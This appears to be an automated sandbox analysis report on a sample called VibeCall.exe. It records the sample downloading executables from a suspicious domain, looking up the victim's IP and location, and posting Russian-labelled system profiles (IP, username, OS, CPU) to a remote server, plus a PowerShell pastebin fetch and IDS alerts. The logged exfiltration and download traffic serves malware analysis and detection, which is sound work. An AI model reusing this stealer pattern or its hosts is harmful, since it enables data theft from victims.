83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 d8 46 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*F
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Feb 2025 17:03:24 GMTContent-Type: application/octet-streamContent-Length: 15991506Connection: keep-aliveLast-Modified: Wed, 26 Feb 2025 13:24:58 GMTETag: "67bf162a-f402d2"Cache-Control: max-age=14400CF-Cache-Status: REVALIDATEDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bkvWrOpQ5VlYARFaySrPlg9CFei2yho19fhjdFAZfImRLa2mNkHw%2Fgm5PdqrwC%2BwMSM5a3sy8ir%2FPE6TpTP1RmoZ%2FrJsVBogVN%2FU28wkz910Sx7PRa94t649DivVXKyOHJvuca88Mi6DgK0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9191fce21dfcc3eb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 06 52 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*R
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Feb 2025 17:03:30 GMTContent-Type: application/octet-streamContent-Length: 16010620Connection: keep-aliveLast-Modified: Wed, 26 Feb 2025 13:31:47 GMTETag: "67bf17c3-f44d7c"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D3lWBWxAX7clCp7V8v7IEa8aO%2FNLLEZMq2PnohyzyNqGq1zkQ%2Bl5EbOwa2QiPLGsRo5XLAHDu520T%2BQQFcWB6%2FrC21YJ6gSQLfwsVVl0RE%2Bs2EqwIxzHQkIMmFfSKcOBX0mGUj%2BNRnIqsGQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9191fd07fb532223-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2012&rtt_var=1006&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 46 52 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*FR
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1102Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 31 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 37 38 33 38 37 35 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 38 43 46 46 4f 4e 41 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 3
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1102Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 32 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 37 38 33 38 37 35 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 38 43 46 46 4f 4e 41 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 3
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1102Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 33 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 37 38 33 38 37 35 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 38 43 46 46 4f 4e 41 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 3
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1102Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 34 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 37 38 33 38 37 35 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 38 43 46 46 4f 4e 41 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 3
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewJA3 fingerprint: 19ed67d089455ee39586e1a3ffdf82ba
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: C:\Users\user\Desktop\VibeCall.exeDNS query: name: ip-api.com
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59320 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59322 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59323 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59324 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59325 -> 208.95.112.1:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59340 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59356 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59387 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59450 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 98.142.253.232:9364 -> 192.168.2.4:59636
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49739 -> 104.20.4.235:443
                      Source: global trafficHTTP traffic detected: GET /raw/ySSytGm5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Content-Length: 35Content-Type: application/dns-message
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
